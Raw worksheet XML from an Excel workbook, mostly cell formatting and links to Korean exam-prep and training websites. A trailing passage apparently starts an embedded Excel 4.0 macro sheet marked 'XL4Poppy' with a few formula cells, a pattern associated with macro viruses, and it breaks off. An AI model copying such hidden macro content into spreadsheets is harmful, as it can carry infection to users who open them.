    <mergeCell ref="A198:A214"/>
    <mergeCell ref="A215:A222"/>
    <mergeCell ref="A223:A264"/>
    <mergeCell ref="B223:B226"/>
    <mergeCell ref="D223:D226"/>
    <mergeCell ref="E223:E226"/>
    <mergeCell ref="F223:F226"/>
    <mergeCell ref="B227:B230"/>
    <mergeCell ref="D227:D229"/>
    <mergeCell ref="E227:E230"/>
    <mergeCell ref="F227:F230"/>
    <mergeCell ref="B236:B238"/>
    <mergeCell ref="D236:D238"/>
    <mergeCell ref="E236:E238"/>
    <mergeCell ref="F236:F238"/>
    <mergeCell ref="B239:B241"/>
    <mergeCell ref="D239:D241"/>
    <mergeCell ref="E239:E241"/>
    <mergeCell ref="F239:F241"/>
    <mergeCell ref="B242:B244"/>
    <mergeCell ref="D242:D244"/>
    <mergeCell ref="E242:E244"/>
    <mergeCell ref="F242:F244"/>
    <mergeCell ref="B246:B247"/>
    <mergeCell ref="D246:D247"/>
    <mergeCell ref="E246:E247"/>
    <mergeCell ref="F246:F247"/>
    <mergeCell ref="B248:B250"/>
    <mergeCell ref="D248:D250"/>
    <mergeCell ref="E248:E250"/>
    <mergeCell ref="F248:F250"/>
    <mergeCell ref="B251:B252"/>
    <mergeCell ref="D251:D252"/>
    <mergeCell ref="E251:E252"/>
    <mergeCell ref="F251:F252"/>
    <mergeCell ref="B253:B256"/>
    <mergeCell ref="D253:D256"/>
    <mergeCell ref="E253:E256"/>
    <mergeCell ref="F253:F256"/>
    <mergeCell ref="B257:B260"/>
    <mergeCell ref="D257:D260"/>
    <mergeCell ref="E257:E260"/>
    <mergeCell ref="F257:F260"/>
    <mergeCell ref="B261:B264"/>
    <mergeCell ref="D261:D264"/>
    <mergeCell ref="E261:E264"/>
    <mergeCell ref="F261:F264"/>
    <mergeCell ref="A265:A290"/>
    <mergeCell ref="B265:B267"/>
    <mergeCell ref="E265:E267"/>
    <mergeCell ref="F265:F267"/>
    <mergeCell ref="B268:B271"/>
    <mergeCell ref="E268:E271"/>
    <mergeCell ref="F268:F271"/>
    <mergeCell ref="B272:B275"/>
    <mergeCell ref="E272:E275"/>
    <mergeCell ref="F272:F275"/>
    <mergeCell ref="B276:B280"/>
    <mergeCell ref="E276:E280"/>
    <mergeCell ref="F276:F280"/>
    <mergeCell ref="B281:B284"/>
    <mergeCell ref="E281:E284"/>
    <mergeCell ref="F281:F284"/>
    <mergeCell ref="B285:B287"/>
    <mergeCell ref="E285:E287"/>
    <mergeCell ref="F285:F287"/>
    <mergeCell ref="B288:B290"/>
    <mergeCell ref="E288:E290"/>
    <mergeCell ref="F288:F290"/>
    <mergeCell ref="A291:A298"/>
    <mergeCell ref="A299:A306"/>
    <mergeCell ref="B299:B300"/>
    <mergeCell ref="D299:D300"/>
    <mergeCell ref="B304:B306"/>
    <mergeCell ref="D304:D305"/>
    <mergeCell ref="E299:E300"/>
    <mergeCell ref="F299:F300"/>
    <mergeCell ref="B301:B303"/>
    <mergeCell ref="D301:D302"/>
    <mergeCell ref="E301:E303"/>
    <mergeCell ref="F301:F303"/>
    <mergeCell ref="E304:E306"/>
    <mergeCell ref="F304:F306"/>
    <mergeCell ref="F367:F369"/>
    <mergeCell ref="F317:F319"/>
    <mergeCell ref="A324:A332"/>
    <mergeCell ref="A333:A339"/>
    <mergeCell ref="A307:A323"/>
    <mergeCell ref="B317:B319"/>
    <mergeCell ref="D317:D319"/>
    <mergeCell ref="E317:E319"/>
    <mergeCell ref="F361:F363"/>
    <mergeCell ref="B364:B366"/>
    <mergeCell ref="E364:E366"/>
    <mergeCell ref="F364:F366"/>
    <mergeCell ref="A384:A391"/>
    <mergeCell ref="A340:A369"/>
    <mergeCell ref="B361:B363"/>
    <mergeCell ref="E361:E363"/>
    <mergeCell ref="B367:B369"/>
    <mergeCell ref="E367:E369"/>
    <mergeCell ref="F389:F391"/>
    <mergeCell ref="A14:A49"/>
    <mergeCell ref="A133:A185"/>
    <mergeCell ref="B389:B391"/>
    <mergeCell ref="C389:C391"/>
    <mergeCell ref="D389:D391"/>
    <mergeCell ref="E389:E391"/>
    <mergeCell ref="A370:A375"/>
    <mergeCell ref="A376:A378"/>
    <mergeCell ref="A379:A3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H26" sqref="H26"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="15.77734375" style="0" customWidth="1"/>
    <col min="2" max="2" width="16.21484375" style="0" customWidth="1"/>
    <col min="3" max="3" width="33.5546875" style="0" customWidth="1"/>
    <col min="5" max="5" width="21.10546875" style="0" customWidth="1"/>
    <col min="6" max="6" width="12.21484375" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="46.5" customHeight="1">
      <c r="A1" s="300" t="s">
        <v>503</v>
      </c>
      <c r="B1" s="313"/>
      <c r="C1" s="313"/>
      <c r="D1" s="313"/>
      <c r="E1" s="313"/>
      <c r="F1" s="313"/>
    </row>
    <row r="2" spans="1:6" ht="13.5">
      <c r="A2" s="171" t="s">
        <v>522</v>
      </c>
      <c r="B2" s="171" t="s">
        <v>523</v>
      </c>
      <c r="C2" s="171" t="s">
        <v>1083</v>
      </c>
      <c r="D2" s="171" t="s">
        <v>524</v>
      </c>
      <c r="E2" s="171" t="s">
        <v>342</v>
      </c>
      <c r="F2" s="171" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="13.5" customHeight="1">
      <c r="A3" s="305" t="s">
        <v>1225</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>344</v>
      </c>
      <c r="C3" s="119" t="s">
        <v>345</v>
      </c>
      <c r="D3" s="119" t="s">
        <v>346</v>
      </c>
      <c r="E3" s="119" t="s">
        <v>347</v>
      </c>
      <c r="F3" s="119" t="s">
        <v>348</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="22.5">
      <c r="A4" s="306"/>
      <c r="B4" s="12" t="s">
        <v>349</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>350</v>
      </c>
      <c r="D4" s="12" t="s">
        <v>351</v>
      </c>
      <c r="E4" s="133" t="s">
        <v>352</v>
      </c>
      <c r="F4" s="119" t="s">
        <v>353</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="13.5">
      <c r="A5" s="306"/>
      <c r="B5" s="12" t="s">
        <v>354</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>355</v>
      </c>
      <c r="D5" s="12" t="s">
        <v>351</v>
      </c>
      <c r="E5" s="134" t="s">
        <v>356</v>
      </c>
      <c r="F5" s="119" t="s">
        <v>357</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="13.5">
      <c r="A6" s="306"/>
      <c r="B6" s="135" t="s">
        <v>358</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>359</v>
      </c>
      <c r="D6" s="135" t="s">
        <v>360</v>
      </c>
      <c r="E6" s="133" t="s">
        <v>361</v>
      </c>
      <c r="F6" s="119" t="s">
        <v>362</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="13.5">
      <c r="A7" s="306"/>
      <c r="B7" s="135" t="s">
        <v>363</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>364</v>
      </c>
      <c r="D7" s="135" t="s">
        <v>365</v>
      </c>
      <c r="E7" s="133" t="s">
        <v>366</v>
      </c>
      <c r="F7" s="119" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="22.5">
      <c r="A8" s="306"/>
      <c r="B8" s="136" t="s">
        <v>368</v>
      </c>
      <c r="C8" s="119" t="s">
        <v>369</v>
      </c>
      <c r="D8" s="135" t="s">
        <v>1082</v>
      </c>
      <c r="E8" s="119" t="s">
        <v>370</v>
      </c>
      <c r="F8" s="119" t="s">
        <v>371</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="13.5">
      <c r="A9" s="306"/>
      <c r="B9" s="310" t="s">
        <v>372</v>
      </c>
      <c r="C9" s="119" t="s">
        <v>373</v>
      </c>
      <c r="D9" s="119" t="s">
        <v>346</v>
      </c>
      <c r="E9" s="311" t="s">
        <v>374</v>
      </c>
      <c r="F9" s="311" t="s">
        <v>375</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="13.5">
      <c r="A10" s="306"/>
      <c r="B10" s="311"/>
      <c r="C10" s="119" t="s">
        <v>376</v>
      </c>
      <c r="D10" s="119" t="s">
        <v>346</v>
      </c>
      <c r="E10" s="312"/>
      <c r="F10" s="312"/>
    </row>
    <row r="11" spans="1:6" ht="13.5">
      <c r="A11" s="306"/>
      <c r="B11" s="311"/>
      <c r="C11" s="119" t="s">
        <v>377</v>
      </c>
      <c r="D11" s="119" t="s">
        <v>346</v>
      </c>
      <c r="E11" s="312"/>
      <c r="F11" s="312"/>
    </row>
    <row r="12" spans="1:6" ht="13.5">
      <c r="A12" s="306"/>
      <c r="B12" s="311"/>
      <c r="C12" s="135" t="s">
        <v>378</v>
      </c>
      <c r="D12" s="119" t="s">
        <v>379</v>
      </c>
      <c r="E12" s="312"/>
      <c r="F12" s="312"/>
    </row>
    <row r="13" spans="1:6" ht="14.25" thickBot="1">
      <c r="A13" s="307"/>
      <c r="B13" s="145" t="s">
        <v>380</v>
      </c>
      <c r="C13" s="145" t="s">
        <v>381</v>
      </c>
      <c r="D13" s="145" t="s">
        <v>343</v>
      </c>
      <c r="E13" s="145" t="s">
        <v>382</v>
      </c>
      <c r="F13" s="145" t="s">
        <v>383</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="13.5" customHeight="1">
      <c r="A14" s="324" t="s">
        <v>600</v>
      </c>
      <c r="B14" s="101" t="s">
        <v>384</v>
      </c>
      <c r="C14" s="146" t="s">
        <v>385</v>
      </c>
      <c r="D14" s="146" t="s">
        <v>1240</v>
      </c>
      <c r="E14" s="147" t="s">
        <v>386</v>
      </c>
      <c r="F14" s="153" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="13.5">
      <c r="A15" s="222"/>
      <c r="B15" s="2" t="s">
        <v>388</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>389</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>1240</v>
      </c>
      <c r="E15" s="137" t="s">
        <v>390</v>
      </c>
      <c r="F15" s="140" t="s">
        <v>391</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="22.5">
      <c r="A16" s="222"/>
      <c r="B16" s="1" t="s">
        <v>392</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>393</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>1240</v>
      </c>
      <c r="E16" s="138" t="s">
        <v>394</v>
      </c>
      <c r="F16" s="141" t="s">
        <v>395</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="22.5">
      <c r="A17" s="222"/>
      <c r="B17" s="1" t="s">
        <v>396</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>393</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>1240</v>
      </c>
      <c r="E17" s="137" t="s">
        <v>397</v>
      </c>
      <c r="F17" s="141" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="13.5">
      <c r="A18" s="222"/>
      <c r="B18" s="1" t="s">
        <v>399</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>400</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>1240</v>
      </c>
      <c r="E18" s="138" t="s">
        <v>401</v>
      </c>
      <c r="F18" s="140" t="s">
        <v>402</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="13.5">
      <c r="A19" s="222"/>
      <c r="B19" s="1" t="s">
        <v>403</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>404</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>1240</v>
      </c>
      <c r="E19" s="138" t="s">
        <v>405</v>
      </c>
      <c r="F19" s="140" t="s">
        <v>406</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="13.5">
      <c r="A20" s="222"/>
      <c r="B20" s="1" t="s">
        <v>407</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>393</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>1240</v>
      </c>
      <c r="E20" s="138" t="s">
        <v>408</v>
      </c>
      <c r="F20" s="140" t="s">
        <v>409</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="33.75">
      <c r="A21" s="222"/>
      <c r="B21" s="1" t="s">
        <v>410</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>411</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>412</v>
      </c>
      <c r="E21" s="139" t="s">
        <v>413</v>
      </c>
      <c r="F21" s="140" t="s">
        <v>414</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="13.5">
      <c r="A22" s="222"/>
      <c r="B22" s="1" t="s">
        <v>415</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>393</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>1240</v>
      </c>
      <c r="E22" s="138" t="s">
        <v>416</v>
      </c>
      <c r="F22" s="140" t="s">
        <v>417</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="13.5">
      <c r="A23" s="222"/>
      <c r="B23" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>419</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>420</v>
      </c>
      <c r="E23" s="138" t="s">
        <v>421</v>
      </c>
      <c r="F23" s="140" t="s">
        <v>422</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="13.5">
      <c r="A24" s="222"/>
      <c r="B24" s="1" t="s">
        <v>423</v>
      </c>
      <c r="C24" s="142" t="s">
        <v>424</v>
      </c>
      <c r="D24" s="142" t="s">
        <v>19</v>
      </c>
      <c r="E24" s="143" t="s">
        <v>425</v>
      </c>
      <c r="F24" s="141" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="13.5">
      <c r="A25" s="222"/>
      <c r="B25" s="1" t="s">
        <v>427</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>428</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>1257</v>
      </c>
      <c r="E25" s="143" t="s">
        <v>429</v>
      </c>
      <c r="F25" s="141" t="s">
        <v>430</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="14.25" thickBot="1">
      <c r="A26" s="223"/>
      <c r="B26" s="4" t="s">
        <v>431</v>
      </c>
      <c r="C26" s="4" t="s">
        <v>432</v>
      </c>
      <c r="D26" s="5" t="s">
        <v>433</v>
      </c>
      <c r="E26" s="154" t="s">
        <v>434</v>
      </c>
      <c r="F26" s="155" t="s">
        <v>435</v>
      </c>
    </row>
    <row r="27" spans="1:7" ht="22.5">
      <c r="A27" s="245" t="s">
        <v>497</v>
      </c>
      <c r="B27" s="81" t="s">
        <v>437</v>
      </c>
      <c r="C27" s="81" t="s">
        <v>438</v>
      </c>
      <c r="D27" s="81" t="s">
        <v>439</v>
      </c>
      <c r="E27" s="156" t="s">
        <v>440</v>
      </c>
      <c r="F27" s="82" t="s">
        <v>441</v>
      </c>
      <c r="G27" s="170"/>
    </row>
    <row r="28" spans="1:7" ht="13.5">
      <c r="A28" s="244"/>
      <c r="B28" s="121" t="s">
        <v>313</v>
      </c>
      <c r="C28" s="121" t="s">
        <v>314</v>
      </c>
      <c r="D28" s="121" t="s">
        <v>1267</v>
      </c>
      <c r="E28" s="219" t="s">
        <v>315</v>
      </c>
      <c r="F28" s="218" t="s">
        <v>316</v>
      </c>
      <c r="G28" s="170"/>
    </row>
    <row r="29" spans="1:7" ht="13.5">
      <c r="A29" s="244"/>
      <c r="B29" s="121" t="s">
        <v>317</v>
      </c>
      <c r="C29" s="121" t="s">
        <v>318</v>
      </c>
      <c r="D29" s="121" t="s">
        <v>1267</v>
      </c>
      <c r="E29" s="219" t="s">
        <v>319</v>
      </c>
      <c r="F29" s="218" t="s">
        <v>320</v>
      </c>
      <c r="G29" s="170"/>
    </row>
    <row r="30" spans="1:7" ht="13.5">
      <c r="A30" s="244"/>
      <c r="B30" s="10" t="s">
        <v>442</v>
      </c>
      <c r="C30" s="10" t="s">
        <v>389</v>
      </c>
      <c r="D30" s="10" t="s">
        <v>1267</v>
      </c>
      <c r="E30" s="144" t="s">
        <v>443</v>
      </c>
      <c r="F30" s="11" t="s">
        <v>312</v>
      </c>
      <c r="G30" s="170"/>
    </row>
    <row r="31" spans="1:7" ht="23.25" thickBot="1">
      <c r="A31" s="246"/>
      <c r="B31" s="83" t="s">
        <v>444</v>
      </c>
      <c r="C31" s="83" t="s">
        <v>389</v>
      </c>
      <c r="D31" s="83" t="s">
        <v>1257</v>
      </c>
      <c r="E31" s="157" t="s">
        <v>445</v>
      </c>
      <c r="F31" s="85" t="s">
        <v>446</v>
      </c>
      <c r="G31" s="170"/>
    </row>
    <row r="32" spans="1:6" ht="13.5">
      <c r="A32" s="199" t="s">
        <v>498</v>
      </c>
      <c r="B32" s="269" t="s">
        <v>447</v>
      </c>
      <c r="C32" s="87" t="s">
        <v>448</v>
      </c>
      <c r="D32" s="87" t="s">
        <v>449</v>
      </c>
      <c r="E32" s="314" t="s">
        <v>450</v>
      </c>
      <c r="F32" s="235" t="s">
        <v>451</v>
      </c>
    </row>
    <row r="33" spans="1:6" ht="13.5">
      <c r="A33" s="200"/>
      <c r="B33" s="308"/>
      <c r="C33" s="12" t="s">
        <v>452</v>
      </c>
      <c r="D33" s="12" t="s">
        <v>453</v>
      </c>
      <c r="E33" s="315"/>
      <c r="F33" s="127"/>
    </row>
    <row r="34" spans="1:6" ht="13.5">
      <c r="A34" s="200"/>
      <c r="B34" s="308"/>
      <c r="C34" s="12" t="s">
        <v>454</v>
      </c>
      <c r="D34" s="2" t="s">
        <v>455</v>
      </c>
      <c r="E34" s="315"/>
      <c r="F34" s="127"/>
    </row>
    <row r="35" spans="1:6" ht="13.5">
      <c r="A35" s="200"/>
      <c r="B35" s="308"/>
      <c r="C35" s="12" t="s">
        <v>456</v>
      </c>
      <c r="D35" s="2" t="s">
        <v>449</v>
      </c>
      <c r="E35" s="315"/>
      <c r="F35" s="127"/>
    </row>
    <row r="36" spans="1:6" ht="13.5">
      <c r="A36" s="200"/>
      <c r="B36" s="308"/>
      <c r="C36" s="12" t="s">
        <v>457</v>
      </c>
      <c r="D36" s="2" t="s">
        <v>453</v>
      </c>
      <c r="E36" s="315"/>
      <c r="F36" s="127"/>
    </row>
    <row r="37" spans="1:6" ht="13.5">
      <c r="A37" s="200"/>
      <c r="B37" s="308"/>
      <c r="C37" s="12" t="s">
        <v>454</v>
      </c>
      <c r="D37" s="2" t="s">
        <v>455</v>
      </c>
      <c r="E37" s="315"/>
      <c r="F37" s="127"/>
    </row>
    <row r="38" spans="1:6" ht="13.5">
      <c r="A38" s="200"/>
      <c r="B38" s="308"/>
      <c r="C38" s="12" t="s">
        <v>458</v>
      </c>
      <c r="D38" s="2" t="s">
        <v>459</v>
      </c>
      <c r="E38" s="315"/>
      <c r="F38" s="127"/>
    </row>
    <row r="39" spans="1:6" ht="13.5">
      <c r="A39" s="200"/>
      <c r="B39" s="308"/>
      <c r="C39" s="12" t="s">
        <v>460</v>
      </c>
      <c r="D39" s="2" t="s">
        <v>461</v>
      </c>
      <c r="E39" s="315"/>
      <c r="F39" s="127"/>
    </row>
    <row r="40" spans="1:6" ht="13.5">
      <c r="A40" s="200"/>
      <c r="B40" s="308"/>
      <c r="C40" s="12" t="s">
        <v>462</v>
      </c>
      <c r="D40" s="2" t="s">
        <v>455</v>
      </c>
      <c r="E40" s="315"/>
      <c r="F40" s="127"/>
    </row>
    <row r="41" spans="1:6" ht="13.5">
      <c r="A41" s="200"/>
      <c r="B41" s="308"/>
      <c r="C41" s="12" t="s">
        <v>463</v>
      </c>
      <c r="D41" s="2" t="s">
        <v>461</v>
      </c>
      <c r="E41" s="315"/>
      <c r="F41" s="127"/>
    </row>
    <row r="42" spans="1:6" ht="13.5">
      <c r="A42" s="200"/>
      <c r="B42" s="308"/>
      <c r="C42" s="12" t="s">
        <v>464</v>
      </c>
      <c r="D42" s="2" t="s">
        <v>461</v>
      </c>
      <c r="E42" s="315"/>
      <c r="F42" s="127"/>
    </row>
    <row r="43" spans="1:6" ht="13.5">
      <c r="A43" s="200"/>
      <c r="B43" s="308"/>
      <c r="C43" s="12" t="s">
        <v>465</v>
      </c>
      <c r="D43" s="2" t="s">
        <v>461</v>
      </c>
      <c r="E43" s="315"/>
      <c r="F43" s="127"/>
    </row>
    <row r="44" spans="1:6" ht="13.5">
      <c r="A44" s="200"/>
      <c r="B44" s="308"/>
      <c r="C44" s="12" t="s">
        <v>466</v>
      </c>
      <c r="D44" s="2" t="s">
        <v>461</v>
      </c>
      <c r="E44" s="315"/>
      <c r="F44" s="127"/>
    </row>
    <row r="45" spans="1:6" ht="13.5">
      <c r="A45" s="200"/>
      <c r="B45" s="308"/>
      <c r="C45" s="12" t="s">
        <v>467</v>
      </c>
      <c r="D45" s="2" t="s">
        <v>468</v>
      </c>
      <c r="E45" s="315"/>
      <c r="F45" s="127"/>
    </row>
    <row r="46" spans="1:6" ht="14.25" thickBot="1">
      <c r="A46" s="201"/>
      <c r="B46" s="309"/>
      <c r="C46" s="62" t="s">
        <v>469</v>
      </c>
      <c r="D46" s="5" t="s">
        <v>459</v>
      </c>
      <c r="E46" s="316"/>
      <c r="F46" s="317"/>
    </row>
    <row r="47" spans="1:6" ht="34.5" thickBot="1">
      <c r="A47" s="158" t="s">
        <v>470</v>
      </c>
      <c r="B47" s="159" t="s">
        <v>471</v>
      </c>
      <c r="C47" s="159" t="s">
        <v>472</v>
      </c>
      <c r="D47" s="160" t="s">
        <v>473</v>
      </c>
      <c r="E47" s="161" t="s">
        <v>474</v>
      </c>
      <c r="F47" s="159" t="s">
        <v>475</v>
      </c>
    </row>
    <row r="48" spans="1:6" ht="66" customHeight="1" thickBot="1">
      <c r="A48" s="158" t="s">
        <v>499</v>
      </c>
      <c r="B48" s="162" t="s">
        <v>476</v>
      </c>
      <c r="C48" s="163" t="s">
        <v>477</v>
      </c>
      <c r="D48" s="159" t="s">
        <v>1257</v>
      </c>
      <c r="E48" s="164" t="s">
        <v>478</v>
      </c>
      <c r="F48" s="159" t="s">
        <v>479</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="51.75" customHeight="1" thickBot="1">
      <c r="A49" s="165" t="s">
        <v>500</v>
      </c>
      <c r="B49" s="166" t="s">
        <v>480</v>
      </c>
      <c r="C49" s="167" t="s">
        <v>481</v>
      </c>
      <c r="D49" s="168"/>
      <c r="E49" s="169" t="s">
        <v>482</v>
      </c>
      <c r="F49" s="168" t="s">
        <v>483</v>
      </c>
    </row>
    <row r="50" spans="1:6" ht="13.5">
      <c r="A50" s="318" t="s">
        <v>501</v>
      </c>
      <c r="B50" s="267" t="s">
        <v>484</v>
      </c>
      <c r="C50" s="86" t="s">
        <v>485</v>
      </c>
      <c r="D50" s="86" t="s">
        <v>1257</v>
      </c>
      <c r="E50" s="321" t="s">
        <v>486</v>
      </c>
      <c r="F50" s="269" t="s">
        <v>502</v>
      </c>
    </row>
    <row r="51" spans="1:6" ht="13.5">
      <c r="A51" s="306"/>
      <c r="B51" s="319"/>
      <c r="C51" s="12" t="s">
        <v>487</v>
      </c>
      <c r="D51" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E51" s="322"/>
      <c r="F51" s="319"/>
    </row>
    <row r="52" spans="1:6" ht="13.5">
      <c r="A52" s="306"/>
      <c r="B52" s="319"/>
      <c r="C52" s="12" t="s">
        <v>488</v>
      </c>
      <c r="D52" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E52" s="322"/>
      <c r="F52" s="319"/>
    </row>
    <row r="53" spans="1:6" ht="13.5">
      <c r="A53" s="306"/>
      <c r="B53" s="319"/>
      <c r="C53" s="12" t="s">
        <v>489</v>
      </c>
      <c r="D53" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E53" s="322"/>
      <c r="F53" s="319"/>
    </row>
    <row r="54" spans="1:6" ht="13.5">
      <c r="A54" s="306"/>
      <c r="B54" s="319"/>
      <c r="C54" s="12" t="s">
        <v>490</v>
      </c>
      <c r="D54" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E54" s="322"/>
      <c r="F54" s="319"/>
    </row>
    <row r="55" spans="1:6" ht="13.5">
      <c r="A55" s="306"/>
      <c r="B55" s="319"/>
      <c r="C55" s="12" t="s">
        <v>491</v>
      </c>
      <c r="D55" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E55" s="322"/>
      <c r="F55" s="319"/>
    </row>
    <row r="56" spans="1:6" ht="13.5">
      <c r="A56" s="306"/>
      <c r="B56" s="319"/>
      <c r="C56" s="12" t="s">
        <v>492</v>
      </c>
      <c r="D56" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E56" s="322"/>
      <c r="F56" s="319"/>
    </row>
    <row r="57" spans="1:6" ht="13.5">
      <c r="A57" s="306"/>
      <c r="B57" s="319"/>
      <c r="C57" s="12" t="s">
        <v>493</v>
      </c>
      <c r="D57" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E57" s="322"/>
      <c r="F57" s="319"/>
    </row>
    <row r="58" spans="1:6" ht="13.5">
      <c r="A58" s="306"/>
      <c r="B58" s="319"/>
      <c r="C58" s="12" t="s">
        <v>494</v>
      </c>
      <c r="D58" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E58" s="322"/>
      <c r="F58" s="319"/>
    </row>
    <row r="59" spans="1:6" ht="13.5">
      <c r="A59" s="306"/>
      <c r="B59" s="319"/>
      <c r="C59" s="12" t="s">
        <v>495</v>
      </c>
      <c r="D59" s="12" t="s">
        <v>1257</v>
      </c>
      <c r="E59" s="322"/>
      <c r="F59" s="319"/>
    </row>
    <row r="60" spans="1:6" ht="14.25" thickBot="1">
      <c r="A60" s="307"/>
      <c r="B60" s="320"/>
      <c r="C60" s="62" t="s">
        <v>496</v>
      </c>
      <c r="D60" s="62" t="s">
        <v>1257</v>
      </c>
      <c r="E60" s="323"/>
      <c r="F60" s="320"/>
    </row>
  </sheetData>
  <mergeCells count="15">
    <mergeCell ref="A50:A60"/>
    <mergeCell ref="B50:B60"/>
    <mergeCell ref="E50:E60"/>
    <mergeCell ref="F50:F60"/>
    <mergeCell ref="F9:F12"/>
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="E32:E46"/>
    <mergeCell ref="F32:F46"/>
    <mergeCell ref="A14:A26"/>
    <mergeCell ref="A27:A31"/>
    <mergeCell ref="A32:A46"/>
    <mergeCell ref="A3:A13"/>
    <mergeCell ref="B32:B46"/>
    <mergeCell ref="B9:B12"/>
    <mergeCell ref="E9:E12"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="E17" r:id="rId1" display="www.ssamplus.com"/>
    <hyperlink ref="E16" r:id="rId2" display="www.goodssam.co.kr"/>
    <hyperlink ref="E15" r:id="rId3" display="www.pass-1.co.kr"/>
    <hyperlink ref="E18" r:id="rId4" display="www.edumentor.co.kr"/>
    <hyperlink ref="E19" r:id="rId5" display="http://edu.ike.co.kr"/>
    <hyperlink ref="E20" r:id="rId6" display="www.gosiro.co.kr"/>
    <hyperlink ref="E22" r:id="rId7" display="www.g-school.co.kr"/>
    <hyperlink ref="E23" r:id="rId8" display="www.exam.co.kr"/>
    <hyperlink ref="E14" r:id="rId9" display="http://www.champstudy.com/"/>
    <hyperlink ref="E21" r:id="rId10" display="http://mpva2010.eduspa.com"/>
    <hyperlink ref="E26" r:id="rId11" display="www.techart.or.kr"/>
    <hyperlink ref="E25" r:id="rId12" display="www.teachermeca.co.kr"/>
    <hyperlink ref="E24" r:id="rId13" display="www.kaspa.co.kr"/>
    <hyperlink ref="E27" r:id="rId14" display="www.myssam.co.kr"/>
    <hyperlink ref="E30" r:id="rId15" display="www.edupdkorea.com"/>
    <hyperlink ref="E31" r:id="rId16" display="www.myssam.co.kr"/>
    <hyperlink ref="E32" r:id="rId17" display="www.dumok.net"/>
    <hyperlink ref="E48" r:id="rId18" display="http://www.wowgosi.co.kr"/>
    <hyperlink ref="E49" r:id="rId19" display="http://www.eduview.net"/>
    <hyperlink ref="E50" r:id="rId20" display="http://www.botemi.com"/>
    <hyperlink ref="E28" r:id="rId21" display="www.edupd.com"/>
    <hyperlink ref="E29" r:id="rId22" display="www.10.edupd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06" customWidth="1"/>
    <col min="2" max="2" width="0.9921875" style="206" customWidth="1"/>
    <col min="3" max="3" width="24.99609375" style="206" customWidth="1"/>
    <col min="4" max="16384" width="7.10546875" style="206" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="12.75">
      <c r="A1" s="205" t="s">
        <v>299</v>
      </c>
      <c r="C1" s="206" t="b">
        <f>"XL4Poppy"</f>
        <v>1</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="205" t="s">
        <v>300</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="207" t="s">
        <v>301</v>
      </c>
      <c r="C3" s="208" t="s">
        <v>302</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="207" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4" s="209" t="e">
        <f>C18</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="209" t="b">
        <f>TRUE,</f>
        <v>1</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="209" t="e">
        <f>IF(A4=3)</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="210" t="s">
        <v>303</v>
      </c>
      <c r="C7" s="209" t="b">
        <f>=</f>
